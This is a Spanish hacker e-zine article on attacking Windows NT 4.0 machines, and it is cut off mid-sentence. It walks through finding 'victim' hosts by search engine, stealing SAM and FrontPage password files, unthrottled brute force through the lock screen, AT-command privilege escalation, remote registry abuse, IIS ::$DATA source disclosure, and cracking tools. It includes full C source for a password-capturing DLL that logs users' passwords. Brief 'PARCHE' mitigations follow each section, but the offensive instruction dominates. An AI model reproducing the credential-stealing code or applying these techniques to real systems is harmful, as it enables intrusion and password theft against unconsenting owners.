-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
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
EAVtmc+RAJ4v0LlhqodLGT7NqX2nOWDJ7I1ZJw==
=blXY
-----END PGP PUBLIC KEY BLOCK-----
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
§ §
§ 6.- Seguridad en Windows NT §
§ §
#################################
________________________________________________________________ By Mr.Nexus
= ------------------------------------------------------------------- =
= --- --- --- --- =
= --- --- Seguridad en Windows NT --- --- =
= --- --- =
= -- Por: Mr.Nexus -- =
= - - =
= ------------------ =
= --- -- --- =
= ------------------------------------------------------------------- =
0 - Introduccion
0.1 - Encontrar la victima
0.2 - Buscar info de la maquina
1 - Generalidades:
1.1 - Cuentas por defecto
1.1 - Ubicacion de los passwords
2 - Posibles ataques a una maquina NT
2.1 - Disponiendo de acceso fisico a la maquina
2.1.1 - Disco de inicio 'magico'
2.1.2 - Fuerza bruta
2.1.3 - Buscar en memoria
2.1.4 - Intalar un sniffer
2.1.5 - El comando AT
2.1.6 - BackOffice [Ultima hora]
2.2 - Disponiendo de acceso remoto a la maquina
2.2.1 - El registro.
2.2.2 - WinGates y demas
2.2.3 - Frontpage
2.2.4 - Las debilidades del IIS
2.2.5 - Utilizando los recursos de la propia maquina
2.2.6 - ::$DATA
3 - Herramientas de ataque
3.1 - l0pht Crack
3.2 - GetAdmin
3.3 - NTFS Reader
3.4 - SamDump vs. PwDump2
3.5 - NAT (Netbios Auditing Tool)
3.6 - Nessus
3.7 - Essential NetTools
4 - Medidas de seguridad
4.1 - Politica de passwords
4.2 - Auditar
5 - Corto y cierro
===========================================================================
0 - Introduccion:
=================
Ultimamente nuestra querida Micro$oft esta muy contenta ya que sus
'magnificos' S.O. estan de moda en la red, estoy hablando, como no,
del maravilloso Windows NT 4.0. Pues bien, como nosotros somos gente a la
que no nos gusta nada eso de los monopolios y demas, pues a ver si con
este texto podemos hacer algo para que de una vez por todas al tito Bill
le de por crear un sistema operativo seguro ...
0.1 - Encontrar la victima:
---------------------------
La mejor manera de buscar maquinas NT es con los buscadores,
yahoo, ole, altavista, ...las palabras clave para buscar no son otras que
cualquier cadena que se encuentre en algun archivo publico que se instale
por defecto en una maquina NT, p.ej.- alguna frase de los manuales que
acompañan al sistema operativo, como por ejemplo:
"CAPÍTULO 7. Registro de la actividad del servidor" o directorios
que tan solo se pueden encontrar en un NT, algo del tipo /iisadmin/
0.2 - Buscar info de la maquina:
--------------------------------
Es de todos conocido que cuanta mayor info tengamos sobre la maquina
victima mejor, por lo que antes de pasar al ataque, siempre conviene hacer
un recopilacion de todo lo que pillemos acerca del sistema.
· Podemos empezar con visitar su pagina WEB y mirar a ver si nos
dice algo de los servicios que ofrece, seguridad, ordenadores,
routers y todo lo demas; los servidores mas importantes siempre
suelen tener una seccion en sus pages que explica lo bien preparados
que estan, tanto en infraestructura como en personal, para que los
usuarios queden impresionados ante su poderio.
· La segunda opcion es ir a:
http://www.netcraft.com/cgi-bin/Survey/
y ver que nos dice de la maquina NT que queramos.
· Tambien podemos hacer un "nbtstat -A ", este comando nos
mostrara mucha informacion que podra ser utilizada para diversos
fines, ... buenos o malos.
P.ej.-
Name Type Status | Donde Maquina-NT es el nombre de la
--------------------------------------------- | maquina ... buena deduccion.
Maquina-NT <00> UNIQUE Registered |
Dominio-NT <00> GROUP Registered | Dominio-NT es el nombre del dominio
Maquina-NT <03> UNIQUE Registered | al que pertenece Maquina-NT.
Usuario <03> UNIQUE Registered |
Maquina-NT <20> UNIQUE Registered | Y Usuario es el login del usuario que
Dominio-NT <1E> GROUP Registered | esta logueado en ese momento.
|
MAC Address = 00-60-97-35-C1-5C | Y esto es su direccion en la ethernet.
· Tambien podemos extraer del sistema una lista completa con los
usuarios, descripciones de los mismos (nombre y apellidos, el mismo peligro
que el finger de los unix), grupo al que pertenecen, dominio, ...
Esto se consigue, mirando las propiedades -> seguridad -> permisos ->
mostrar usuarios , de un directorio sobre el que tengamos control total.
1 - Generalidades:
==================
1.1 - Cuentas por defecto:
---------------------------
Los sistemas Windows NT tienen dos cuentas por defecto:
Administrator - Administrador
Guest - Invitado
Segun se trate de una version inglesa o en castellano del sistema. Tambien
se crean varios grupos de usuarios:
Administradores : Pueden administrar completamente la maquina.
Duplicadores : Pueden duplicar archivos en el dominio.
Invitados : Pueden acceder como invitados al equipo o dominio.
Operadores de copia : Pueden eludir la proteccion de archivos para
realizar copias de seguridad.
Usuarios : Usuarios comunes.
Usuarios avanzados : Pueden compartir recursos e impresoras.
Por supuesto se pueden crear otros grupos de usuarios que se adecuen mas a
las necesidades de cada administrador, pero en ningun caso se podran borrar
los grupos que se instalan por defecto.
p.ej- en una universidad se pueden crear los grupos profesores, alumnos,
becarios, ... pero siempre estaran los grupos antes listados.
1.1 - Ubicacion de los passwords:
---------------------------------
· En un sistema NT tambien hay unos archivos que contienen las claves
de los usuarios, como en los sistemas unix y su famoso etc/passwd, en el
caso de un NT estos archivos son los SAM que se encuentran en:
\WINNT\SYSTEM32\CONFIG\SAM <-- Esta es la copia principal
\WINNT\REPAIR <-- Y esta es la copia de seguridad por
defecto por si ocurre alguna
catastrofe en el sistema.
· Otra forma de conseguir estos archivos es haciendo un disco de
inicio de la maquina ya que en estos discos tambien se guardan los archivos
SAM para que aun en el caso de iniciar con disco, se pueda seguir manteniendo
las cuentas.
· Tambien se pueden volcar los passwords encriptados desde el
registro, gracias a utilidades como el l0phtCrack o similares, descritas mas
abajo.
PARCHE: · Eliminar todos los permisos que puedan comprometer la seguridad de
estos directorios, y deshabilitar la opcion para que los usuarios puedan
crear discos de inicio.
· Modificar los permisos por defecto en el registro del sistema (explicado
mas abajo).
2 - Posibles ataques a una maquina NT:
======================================
2.1 - Disponiendo de acceso fisico a la maquina:
-------------------------------------------------
Si tenemos acceso fisico al sistema podemos decir que la maquina ya
es nuestra, podremos poner sniffers, probar ataques de fuerza bruta con
mucha mas velocidad que si fuera acceso remoto, toquetear con el registro y
mil y una cosas mas, ... empecemos.
2.1.1 - Disco de inicio 'magico':
---------------------------------
Si no tenemos los suficientes permisos para acceder a ciertas partes
del HD de la maquina seguro que nos pica la curiosidad por saber que es lo
que nos esconden, ... lo tenemos facil, primero tenemos que conseguir un
disco de inicio del w95 y copiar en el la ultima version que tengamos del
NTFS reader (un programilla que permite leer el sistema de archivos del NT
-NTFS- trabajando desde otro sistema, en este caso FAT), entonces metemos el
disco en la disquetera, reiniciamos y nos saldra el prompt del DOS, si ahora
probamos a hacer un dir al c: veremos que nos dara un error de no se que,
pero si ejecutamos nuestro NTFS reader y nos vamos a la unidad que el
programilla nos diga, por defecto h: y hacemo dir, veremos con asombro como
disponemos de un permiso de solo lectura de todo el HD.
PARCHE: Eliminar la disquetera, hummm, ...
2.1.2 - Fuerza bruta:
---------------------
Aprovechando la velocidad de autentificacion en una maquina local,
podemos probar ataques de fuerza bruta, ademas tenemos la suerte de que en
todos los sistemas Windows cuando vamos a introducir nuestro nombre de
usuario y nuestra clave, podemos ver el nombre de usuario del ultimo
individuo que logueo en la maquina, asi que, ... a probar!
Pero ojo! lo mas probable es que el Administrador del equipo halla habilitado
una politica de seguridad en la que si se supera un numero de intentos
determinado al intentar meter una clave la cuenta queda bloqueada por un
periodo de tiempo a definir. Pero no hay problema, si sabemos el login del
admin (por defecto Administrador, pero se ha podido crear otra cuenta con
esos privilegios y desactivar la primera), podemos probar por fuerza bruta
hasta que nos cansemos (algo que seguramente pasara), porque la cuenta del
administrador no puede bloquearse bajo ningun concepto, si no fuera asi,
menudo caos.
PARCHE: · Aplicar el parche que Microsoft ha puesto al publico para evitar la
aparicion del login del ultimo usuario que utilizo la terminal.
· Usar una buena politica de claves.
TRUCO (del almendruco): En las maquinas NT hay una opcion disponible para
todos los usuarios que permite dejar colgado un trabajo a la mitad
y bloquear la maquina (para ir a mear por ejemplo). Para
desbloquearla hay que meter de nuevo la clave y ... si probamos
fuerza bruta por aqui no tendremos limite de intentos!!!
2.1.3 - Buscar en memoria:
--------------------------
Lo que peor hacen los sistemas windows es su forma de gestionar la
memoria, ponen unas cosas encima de otras sin ningun orden, y eso lo hace tan
inestable (entre otras cosas), a lo que iba, que entre estas cosas que se
meten en memoria se incluyen los logins y las claves de los usuarios, por lo
tanto si tenemos permisos para hacer un debug en la memoria de la maquina
(cosa poco probable puesto que por defecto solo tienen permisos para esto
los usuarios del grupo de administradores, pero bueno, se dan estos permisos
a gente que necesita utilizar debuggers, p.ej - estudiantes en practicas de
programacion), pero bueno, si se poseen permisos para esto, podemos enchufar
el debugger y buscar estas cadenas:
lMprNotifyUserName=xxxx
lMprNotifyPassword=yyyy
siendo xxxx el login e yyyy el password. Generalmente estas cadenas se
encontraran en la parte de la memoria asignada al winlogon.exe, pero bueno,
buscar en memoria apenas tarda algun segundo asi que no importa mucho.
PARCHE: Dejar los permisos por defecto intactos en este tema, o no dar el
permiso SE_DEBUG a ningun usuario. Aunque de todas formas, me parece
que el Service Pack 3 corrige este bug.
2.1.4 - Intalar un sniffer:
---------------------------
Antes de iniciar una sesion Windows NT, el sistema nos pide que
pulsemos la ya conocida secuencia de teclas, Ctrl + Alt + Supr, esto hace
que se maten en este momento los procesos de algun posible sniffer que este
instalado en el sistema. Por esto los sniffers diseñados para DOS o para w9x
no tiran en NT, pero por eso se han inventado otros medios alternativos para
cargar un sniffer:
· Lo primero que podemos hacer es abrir el registro e ir a las llaves:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Y meter aqui el path en donde este el archivo que queramos que se ejecute
cuando algun usuario inicie sesion, [ TRUCO (del almendruco): hay que
resaltar que la estension del ejecutable no tiene porque ser exe, com, bat
o algo parecido, vale con que sea xyz o lo que te apetezca porque cuando un
NT ejecuta un archivo no comprueba su extension sino que lo ejecuta sin mas,
esto nos puede valer tambien para saltar posibles filtros de extensiones ].
· Tambien hay otro sniffer muy famoso que podemos utilizar en un NT,
consiste en un codigo en C que si se copia una vez compilado al directorio
\winnt\system32 con el nombre FPNWCLNT.DLL, este pillara todos los logins
y passwords y los pegara en un archivo en \temp, pwdchange.out
Aqui te pongo el fuente,
------------------------------ cortar --------------------------------
#include
#include
#include
struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};
static HANDLE fh;
BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:\temp\pwdchange.out", GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
return TRUE;
}
LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
struct UNI_STRING *passwd)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;
memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
return 0L;
}
------------------------------ cortar --------------------------------
PARCHE: · Cambiar los permisos por defecto del registro, y tener cuidado con
esas llaves problematicas.
· Para parchear el Sniffer-Dll debemos eliminar la entrada:
Notification Packages: REG_MULTI_SZ: FPNWCLNT
de esta llave del registro:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
2.1.5 - El comando AT:
----------------------
El comando AT en Windows NT es una de las mejores maneras de saltarse
las protecciones del sistema y al ser algo relativamente poco conocido, son
muchos los sistemas que podemos explotar gracias a esto. En el caso que voy a
mostrar es el de conseguir un acceso tota al registro del sistema, para poder
utilizar el comando AT es necesario tener primero activado el servicio
SCHEDULE, esto se consigue en el Panel de Control -> Servicios -> Schedule
y le damos a iniciar, despues de esto nos vamos a la consola y escribimos el
AT con lo siguientes parametros:
at /interactive "regedt32.exe"
Siendo la hora a la que quieres que se ejecute solo el regedt32.exe,
y escrita de la forma: horas:minutos Gracias a este comando podemos lanzar
los programas que queramos sin tener privilegios para hacerlo, incluso
podemos lanzar comandos en un equipo remoto, siendo el unico requisito el
que este iniciado el Schedule, este es un comando que nos puede ayudar mucho
asi que cuanto mejor se domine, pues mejor. Mirate la ayuda para completar
lo dicho.
PARCHE: · Deshabilitar el acceso al panel de control puesto que este puede
ser el inicio de muchos posibles ataques a nuestra maquina.
· Eliminar el comando AT (aunque si el hacker lleva uno de casa en
un disco, ... )
2.1.6 - BackOffice [Ultima hora]:
---------------------------------
Hace muy poquito, Microsoft lanzo una nueva alerta sobre un bug en
uno de sus programillas, concretamente el BackOffice Server 4.0,
es algo muy simple, pero puedes pillar acceso como Administrador
por la cara. Resulta que en la instalacion del BackOffice, si se selecciona
instalar uno de estos tres complementos: SQL Server, Exchange Server o
Microsoft Transaction Server, pues resulta que el programa de instalacion
pide el login y la clave del usuario y esto se copia en:
\Program Files\Microsoft Backoffice\Reboot.ini
Pues bien, ya sabes, si tienes acceso a este fichero, ya tienes lo que
querias.
PARCHE: Borrar el fichero Reboot.ini
2.2 - Disponiendo de acceso remoto a la maquina:
================================================
2.2.1 - El registro:
--------------------
El registro del Windows es el alma del sistema, y por lo tanto si
tenemos acceso a el, el sistema sera nuestro. Todos los Windows NT cometen
un fallo de seguridad imperdonable en el registro, por defecto esta permitido
el acceso remoto al mismo con las consecuencias que ello supone, un atacante
que se conecte con el registro de un NT remoto en principio solo tiene acceso
a ciertos arboles del registro, pero para empezar es mas que suficiente:
Key_Classes_Root : En este arbol tenemos permisos de lectura, lo que nos
permitira ver que programas tiene en el HD el remoto,
asi como conocer la ruta de acceso a los mismos y a
archivos tan importantes como el secring.skr, por ejemplo.
Key_Current_Config : Aqui tenemos permisos de lectura pero no hay nada muy
importante.
Key_Users : En este arbol tenemos permiso de lectura en solo una rama, la
\.DEFAULT, pero es suficiente para ver que configuraciones
por defecto estan activadas en el remoto.
Key_Local_Machine : En este arbol estan los datos mas importantes del sistema,
aqui estan las claves de todos los usuarios, pero no
tenemos los suficientes permisos para verlas. Y tambien en
este arbol esta la mas grande chapuza que Bill metio en el
NT, en la rama \SOFTWARE se tiene permiso para eliminarla
por completo, para añadir nuevas llaves, ... un control
casi total, con todos los peligros que ello supone.
Podriamos activar y desactivar el acceso remoto (RAS),
jugar con muchos parametros del NetBios, hacer
inoperativos los HotFixes que esten instalados en el
sistema, ...
El registro del Windows, tanto NT como 9x controla el sistema operativo, y es
increible que los esbirros de Bill hallan descuidado tanto algo tan
importante como el registro con esos permisos de pena.
PARCHE: Si se añade la entrada (DWORD):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
y se pone a 1, el acceso remoto al registro quedara deshabilitado.
2.2.2 - WinGates y demas:
-------------------------
Una maquina con el software WinGate en sus adentros y con un
administrador pardillo es una victima en potencia de alguna entrada no
autorizada, mucho se ha escrito acerca de este software pero seria pecado
no nombrarlo aqui, por lo menos por lo alto.
Una maquina con el WinGate en la que no se halla modificado la instalacion
por defecto, contiene una serie de backdoors que son ... bueno, una burrada,
p.ej .- · Si se hace un telnet a los puertos 23 o 1080 podremos hacernos un
bouncer sin que nos loguee -por defecto-.
· Con el puerto 6667 podemos hacer un bouncer para el IRC.
· Si abrimos una sesion http al puerto 8010 tendremos permisos de
lectura en el directorio del admin.
PARCHE: - Cambiar casi por completo las configuraciones por defecto en el
WinGate.
- No usar WinGate.
2.2.3 - Frontpage:
------------------
Aunque el FrontPage no es algo exclusivo de los servers NT, como se
trata de un producto de Microsoft, me apatece decir algo de el, ...
El Microsoft Frontpage es una fuente inagotable de posibles ataques
contra la maquina, hay por ahi documentos que se dedican por completo a
explicar todos sus fallos por lo que aqui dare solo lo elemental.
Los servers con las extensiones del FrontPage instaladas se distinguen
facilmente porque tienen un directorio llamado:
http://www.Server.com/_vti_bin/
el cual sera el blanco de nuestros ataques:
La extructura dedirectorios de uns server con FrontPage es la siguiente:
\Content\cgi-bin
\Content\cgi-bin\_vti_cnf
\Content\images
\Content\images\_vti_cnf
\Content\_private
\Content\_vti_bin
\Content\_vti_bin\_vti_adm
\Content\_vti_bin\_vti_aut
\Content\_vti_cnf
\Content\_vti_log
\Content\_vti_pvt
\Content\_vti_pvt\_vti_cnf
\Content\_vti_txt
\Server
\Server\conf
\Server\conf\maps
\Server\icons
\Server\logs
\Server\support
Bueno, pues los archivos que nos interesan estan en \_vti_pvt\ y son los pwd,
que tienen el pass de la WEB encriptado en DES (que por cierto, ya ha habido
quien ha machacado el DES en 22 horas), de la forma:
Administrador:peMeQbUKK.URQ
tan solo tenemos que modificar el phichero para ponerlo como el tipico passwd
de unix y pasarle el John.
OK, vale, y que? pues que si buscamos en cualquier buscador yahoo , hotbot,
... una cadena tal que: /_vti_pvt_/service.pwd nos encontraremos gratamente
con decenas de servers con las claves al aire, despues no tenemos nada mas
que hacer que ir a nuestro FrontPage y modificar la web del server tal y
como mas nos guste.
PARCHE: - Ajustar los permisos correctamente para los directorios del
FrontPage.
- No usar FrontPage (al fin y al cabo, no hace mas que comer HD).
2.2.4 - Las debilidades del IIS:
--------------------------------
El famoso Internet Information Server tiene tambien muchos agujeros
de seguridad que merece la pena comentar, algunas versiones viejas del IIS,
son vulnerables a ataques cutres de estos que pones en el netscape -algo- y
entras, en fin, pero como eso ya esta muy explicado y muy quemado -aunque yo
sigo viendo mucho por ahi IIS v2.0-, pues mejor te cuento las ultimas
adquisiciones en forma de bugs:
+ En el IIS v4.0, la instalacion, asigna por defecto permisos especiales a
estos directorios:
/W3SVC/1/ROOT/msadc
/W3SVC/1/ROOT/News
/W3SVC/1/ROOT/Mail
/W3SVC/1/ROOT/cgi-bin
/W3SVC/1/ROOT/SCRIPTS
/W3SVC/1/ROOT/IISADMPWD
/W3SVC/1/ROOT/_vti_bin
/W3SVC/1/ROOT/_vti_bin/_vti_adm
/W3SVC/1/ROOT/_vti_bin/_vti_aut
y a la hora de instalar, por defecto estos directorios se encuentran en:
msadc c:\program files\common\system\msadc
News c:\InetPub\News
Mail c:\InetPub\Mail
cgi-bin c:\InetPub\wwwroot\cgi-bin
SCRIPTS c:\InetPub\scripts
IISADMPWD C:\WINNT\System32\inetsrv\iisadmpwd
Recuerda que _vti_bin se instala con el frontpage.
Pues bien, entre los permisos que se asignan en estos directorios, destacan
los de escribir y ejecutar, o sea que si podemos ejecutar un archivo que
subimos nosotros, podriamos comprometer seriamente la seguridad del sistema.
PARCHE: Verificar los permisos en los directorios virtuales del servidor de
http.
Tambien tenemos otra manera de atacar un IIS que es mucho mas fina y
profesional, si nos vamos directamente a la web:
http://www.maquina-NT.com/iisadmin/default.htm
veremos como desde aqui podemos controlar todo el servidor, y veremos la
documentacion del server y demas tonterias de esas, por supuesto
necesitaremos la clave del admin, ¿o que pensabas?.
Pssst, ... fuerza bruta.
Para encontrar servers con esta web operativa, volvemos a nuestro yahoo,
altavista, o lo que sea y buscamos: iisadmin, logico no?.
PARCHE: - Eliminar esa web, asi de radical. O mas simple, cambiar los
permisos.
2.2.5 - Utilizando los recursos de la propia maquina:
-----------------------------------------------------
Es sorprendente la incompetencia de muchos administradores, en muchas
maquinas NT se puede acceder el archivo de claves simplemente con nuestro
navegador habitual, y utilizando las herramientas que el propio administrador
del sistema nos ofrece. Como por ejemplo? pues los buscadores, en muchas
maquinas NT si vamos a la direccion:
http://www.maquina-NT.com/samples/search/queryhit.htm
o en su defecto a:
http://www.maquina-NT.com/scripts/samples/search/webhits.exe
Nos encontraremos con un par de magnificos buscadores de archivos dentro del
servidor, ¿y si buscamos archivos de claves?, pues eso, te sorprenderas
cuando salgan en tu monitor esos ficheros SAM listos para ser copiados.
Tambien podemos buscar las claves del FrontPage, tan solo debemos poner:
#filename=*.pwd
Para que nos encuentre todos los archivos con esta extension. Tambien cabe la
posibilidad de que el Administrador halla cambiado el nombre y la extension
de dichos phicheros, pero para salvar este pequeño problema basta con buscar:
#filename=#haccess.ctl
editamos este archivo y veremos algo asi:
-FrontPage-
Options None
order deny,allow
deny from all
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/claves.666
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
Y en la penultima linea vemos el nuevo nombre del archivo de claves, lo
pillamos y listo :-)
PARCHE: Pues lo de antes, quitar estas web's o restringir el rango de
busqueda de las mismas.
2.2.6 - ::$DATA :
-----------------
Cuando aparecio este bug los chicos de microsoft se espantaron de lo
inutiles que pueden llegar a ser. El comando ::$DATA no es otra cosa que uno
de tantos comandos indocumentados que hay por ahi y lo que hace el bajarse el
fuente que queramos del server en forma de *.exe, y si lo editamos, podremos
ver redireccionamientos de webs ocultos, datos comprometedores, e incluso
claves para partes de la web.
La forma de utilizar el comando es poner ::$DATA a continuacion de algun
*.asp, *.vbd o alguna web de este tipo. Ej.-
http://www.maquina-NT.com/usuarios.asp::$DATA
Ok?, pues vale, pues eso.
PARCHE: - Instalar el parche que Microsoft puso al publico en su ftp.
- instalar un filtro para este bug que te puedes bajar de:
http://www.softwing.com/iisdev/ddatafix/
NOTA: Curiosamente, hace bien poco, los chicos de la CPNE descubrieron que un
server de Telefonica, a pesar de lo conocido de este bug, seguia
estando abierto y se podia entrar a partes restringidas de su WEB.
3 - Herramientas de ataque :
============================
3.1 - l0pht Crack :
-------------------
El magnifico l0pht Crack es una herramienta que comprueba la
seguridad de los passwords de un sistema NT, o sea, un crackeador por fuerza
bruta. Actualmente es el crackeador por excelencia y es muy, muy, muy rapido.
En una maquina de nivel bajo-medio, un pentium 150, se puede sacar un pass de
8 caracteres con mayusculas, minusculas, numeros y especiales en menos de un
dia.
Pero claro, esta herramienta necesita primero tener el fichero con
las claves, que ya sabes de donde pillarlo, ... tienes muchas opciones,
registro, SAM's, ...
http://www.l0pht.com/l0phtcrack
Actualmente, va por la version 2.51 y desgraciadamente, al ser
shareware, tan solo podemos utilizarla durante 15 dias, pero, ... merece la
pena. Ademas, en sus ultimas versiones añade un sniffer para NT si se corre
en una ethernet, y funciona muy bien, ;-)
3.2 - GetAdmin :
----------------
El getadmin es un exploit para NT, lo que hace es añadir al usuario
que le digamos (menos el invitado) al grupo de administradores, Microsoft
parcheo 'rapidamente' este fallo por los peligros que podia acarrear, te
recuerdo que en la version 3.51 del NT la cuenta 'guest' o 'invitado' estaba
al aire, por lo que si entrabamos y corriamos el getadmin ... tela marinera.
Pero como el tito Bill siempre favorece a los hackers, en seguida puso un
nuevo agujero en sus NT's y se creo el GetAdmin2, que lo puedes encontrar por
ahi de dos maneras:
· getadmin2.exe : Pues como el primero, hace lo mismo y se pasa por
el forro el parche de Microsoft.
· crash2.exe : Si pillas este, deberas ejecutar el crash2.exe, que
'prepara' el sistema para el getadmin original, y despues, rulas el
getadmin.exe y ya estas dentro!
Pero no todo es de color de rosa, Microsoft tambien parcheo esta segunda
version y por otra parte, ya es muy dificil encontrar una maquina con la
cuenta de invitado abierta.
3.3 - NTFS Reader :
-------------------
El NTFS Reader no es una hack-tool propiamente dicha pero es muy util
para aquellas personas que hackeen desde otro sistema que no sea NT. El NTFS
es el sistema de achivos propio del NT y si no es desde otro NT, no se puede
leer en el. Pues para eso sirve el NTFS Reader, esta herramienta reconoce
todas las unidades de HD de nuestro sistema y mira si alguna es NTFS, si es
asi, le asigna por defecto la letra h: y nos da un acceso de solo lectura.
Hace un tiempo la ultima version para Dos - Win era la 2.0,
seguramente habra salido otra ya, ... tambien hay version para linux, y te lo
puedes pillar de :
http://www.ntinternals.com
3.4 - SamDump vs. PwDump2 :
--------------------------
Lo que hacen la utilidad SamDump es, como su nombre indica, extraer
los passwords encriptados de un fichero SAM, es una herramienta realmente
util para un NT-Hacker y que te puedes encontrar en cientos de web's por ahi.
Y ahora, la joya de la corona, el PwDump2, que es capaz de extraer
los passwords de la base de datos de cuentas del sistema con el syskey
activado.
En http://www.l0pht.com te puedes bajar esta magnifica utilidad.
NOTA: El SysKey es una herramienta que viene con el NT y que proporciona un
cifrado adicional a la base de datos en que se encuentran las cuentas de la
maquina. Por defecto, este cifrado esta desactivado.
3.5 - NAT (Netbios Auditing Tool) :
-----------------------------------
Como su propio nombre indica, el NAT hace un ataque de fuerza bruta
mediante una lista de usuarios y un diccionario a un host remoto via NetBios.
Asi de simple, y como es una herramienta tan comun y tan difundida, no te voy
a decir de donde la puedes bajar porque seguro que en tu page favorita la
tienes.
Y si lo tuyo no es escribir en la consola, tambien te puedes bajar un
front-end para el NAT, de:
http://www.Rhino9.com
3.6 - Nessus :
--------------
El Nessus, una de las mejores harramientas de diagnostico de un NT,
es un scaner que busca debilidades conocidas en el sistema, y nunca se te
quedara anticuado puesto que se basa en plugin's que chequean los agujeros
del sistema, cuando salga un bug nuevo, te haces el plugin o te lo bajas y
listo!, en un principio el Nessus se hizo exclusivamente para linux pero su
